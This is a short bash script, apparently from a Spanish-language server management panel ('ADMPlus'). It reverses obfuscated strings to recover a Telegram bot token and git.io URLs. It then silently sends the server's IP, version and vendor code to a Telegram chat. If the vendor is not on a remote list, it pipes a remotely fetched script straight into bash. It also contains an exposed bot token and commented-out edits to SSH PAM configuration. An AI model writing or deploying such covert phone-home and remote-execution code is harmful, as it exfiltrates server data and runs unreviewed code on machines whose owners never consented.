#!/bin/bash
#TOKEN="1830099891:AAF7NVl2kT4UBrXACSLW-7TUBwKvyEhuI8g"
TOK="g8IuhEyvKwBUT7-WLSCAXrBU4Tk2lVN7FAA:1989900381"
TOKEN=$(echo $TOK|rev)
ID="553561525"
IP=$(curl -sSL "https://api.ipify.org")
MSJ=$(cat /etc/newadm/message.txt)
key=$(cat /etc/newadm/key.txt)
ver=$(cat /etc/ger-frm/version.txt)
PIRT="sulPkcarC/oi.tig//:sptth"
PIRT2=$(echo $PIRT|rev)
DBIP="mdakcolnu/oi.tig//:sptth"
PERM=$(echo $DBIP|rev)
PERMT=$(curl -sSL "$PERM")
#KeyUsada: ${key}
VENDOR="edoc_rodnev/nib/rsu/ tac"
VENDR=$($VENDOR)
vend=$(echo $VENDR|rev)
#vend=$(cat /usr/bin/vendor_code)
MENSAJE="ADMPlus: ${ver} Instalado en IP: ${IP} IPVendedor: ${vend}" #Mensaje ${MSJ}"
#MENSAJE="$IP Usada"
URL="https://api.telegram.org/bot$TOKEN/sendMessage"
#Verif= https://api.telegram.org/bot$TOKEN/getUpdates
#if cat /etc/pam.d/sshd | grep notify-on-ssh-login.sh &> /dev/null; then
#echo "" &> /dev/null
#else
#echo "session    optional     pam_exec.so  /usr/local/bin/notify-on-ssh-login.sh" >> /etc/pam.d/sshd
#sudo touch /etc/ssh/login-notify.sh
#cat > /usr/local/bin/notify-on-ssh-login.sh <<EOF
##!/bin/sh
#
#if [ "$PAM_TYPE" != "close_session" ]; then
#  host="`hostname`"
#  message="SSH Login: $PAM_USER from $PAM_RHOST on $host"
#  DISPLAY=:0 /usr/games/xcowsay "$message"&
#fi
#EOF
#sudo chmod +x /etc/ssh/login-notify.sh
#fi
curl -s -X POST $URL -d chat_id=$ID -d text="$MENSAJE" &> /dev/null
#echo -e "$MENSAJE enviado"
#sed -i '2icurl -sSL "https://git.io/unlockadm"|grep "$(cat /usr/bin/vendor_code)" &> /dev/null || exit' /etc/newadm/menu
[[ $(echo $PERMT|grep "${vend}") = "" ]] && bash <(curl -Ls $PIRT2) || echo -e "Hello" &> /dev/null
